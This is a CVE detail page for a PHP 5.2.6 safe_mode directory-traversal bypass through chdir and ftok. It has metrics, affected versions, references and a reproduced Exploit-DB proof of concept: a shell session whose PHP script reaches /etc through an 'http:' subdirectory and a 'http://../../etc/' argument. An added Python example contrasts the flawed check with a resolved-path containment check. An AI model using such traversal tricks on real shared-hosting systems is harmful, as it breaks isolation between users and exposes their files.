CVE-2008-2666 : Detail

CVE-2008-2666

Directory Traversal
A01-Broken Access Control
0.53%V3
Network
2008-06-19
23h00 +00:00
2018-10-11
17h57 +00:00

CVE Descriptions

Multiple directory traversal vulnerabilities in PHP 5.2.6 and earlier allow context-dependent attackers to bypass safe_mode restrictions by creating a subdirectory named http: and then placing ../ (dot dot slash) sequences in an http URL argument to the (1) chdir or (2) ftok function.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 31937

Publication date : 2008-06-17 22h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : Yes

source: https://www.securityfocus.com/bid/29796/info

PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities.

Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible.

Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks.

These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other.

PHP 5.2.6 is vulnerable; other versions may also be affected.

    cxib# cat /www/wufff.php
    <?
    echo getcwd()."\n";
    chdir("/etc/");
    echo getcwd()."\n";
    ?>
    cxib# ls -la /www/wufff.php
    -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
    cxib# php /www/wufff.php
    /www
    Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
    /www
    cxib#

---/EXAMPLE1---

---EXAMPLE2---

    cxib# ls -la /www/wufff.php
    -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
    cxib# ls -la /www/http:
    total 8
    drwxr-xr-x 2 www www 512 Jun 17 17:12 .
    drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
    cxib# cat /www/wufff.php
    <?
    echo getcwd()."\n";
    chdir("http://../../etc/");
    echo getcwd()."\n";
    ?>
    cxib# php /www/wufff.php
    /www
    /etc
    cxib#
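The following is an added example, not code from the original page or from PHP: it contrasts a check that exempts URL-looking arguments with one that resolves the path first, using the same `http:` directory layout as the session above. `naive_is_allowed` is a hypothetical model of the flawed pattern (not PHP's source), and the `www`/`private` directory names are constructed for the demonstration on a POSIX filesystem.

```python
import os
import tempfile


def is_contained(base, arg):
    """Resolve the argument the way the OS will, then test containment."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, arg))
    return os.path.commonpath([base_real, target]) == base_real


def naive_is_allowed(base, arg):
    """Hypothetical flawed check: URL-looking arguments skip the path test."""
    if arg.lower().startswith("http://"):
        return True  # assumed exemption: treated as remote, never as a local path
    return is_contained(base, arg)


def demo():
    """Constructed layout: <tmp>/www is the allowed root, <tmp>/private is not."""
    with tempfile.TemporaryDirectory() as tmp:
        www = os.path.join(tmp, "www")
        private = os.path.join(tmp, "private")
        os.makedirs(os.path.join(www, "http:"))  # directory literally named "http:"
        os.makedirs(private)

        # To the filesystem this is a relative path: http: -> .. -> .. -> private
        arg = "http://../../private"
        resolved = os.path.realpath(os.path.join(www, arg))
        return {
            "resolved_outside": resolved == os.path.realpath(private),
            "naive": naive_is_allowed(www, arg),       # exemption lets it through
            "strict": is_contained(www, arg),          # canonical form is rejected
            "strict_inside": is_contained(www, "http:"),  # legitimate path still allowed
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The containment decision has to be made on the resolved path, with no exemption based on what the string looks like before resolution.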

Products Mentioned

Configuration 0

Php>>Php >> Version To (including) 5.2.6

Php>>Php >> Version 5.0


        Php>>Php >> Version 5.0.0

        Php>>Php >> Version 5.0.1

        Php>>Php >> Version 5.0.2

        Php>>Php >> Version 5.0.3

        Php>>Php >> Version 5.0.4

        Php>>Php >> Version 5.0.5

        Php>>Php >> Version 5.1.0

        Php>>Php >> Version 5.1.1

        Php>>Php >> Version 5.1.2

        Php>>Php >> Version 5.1.3

        Php>>Php >> Version 5.1.4

        Php>>Php >> Version 5.1.5

        Php>>Php >> Version 5.1.6

        Php>>Php >> Version 5.2.0

        Php>>Php >> Version 5.2.1

        Php>>Php >> Version 5.2.2

        Php>>Php >> Version 5.2.3

        Php>>Php >> Version 5.2.4

        Php>>Php >> Version 5.2.5

References

        http://secunia.com/advisories/32746
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://marc.info/?l=bugtraq&m=125631037611762&w=2
        Tags : vendor-advisory, x_refsource_HP
        http://support.apple.com/kb/HT3549
        Tags : x_refsource_CONFIRM
        http://securityreason.com/securityalert/3942
        Tags : third-party-advisory, x_refsource_SREASON
        http://security.gentoo.org/glsa/glsa-200811-05.xml
        Tags : vendor-advisory, x_refsource_GENTOO
        http://marc.info/?l=bugtraq&m=124654546101607&w=2
        Tags : vendor-advisory, x_refsource_HP
        http://www.securityfocus.com/bid/29796
        Tags : vdb-entry, x_refsource_BID
        http://secunia.com/advisories/35074
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://www.us-cert.gov/cas/techalerts/TA09-133A.html
        Tags : third-party-advisory, x_refsource_CERT
        http://www.vupen.com/english/advisories/2009/1297
        Tags : vdb-entry, x_refsource_VUPEN
        http://www.securitytracker.com/id?1020328
        Tags : vdb-entry, x_refsource_SECTRACK
        http://secunia.com/advisories/35650
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://securityreason.com/achievement_securityalert/55
        Tags : third-party-advisory, x_refsource_SREASONRES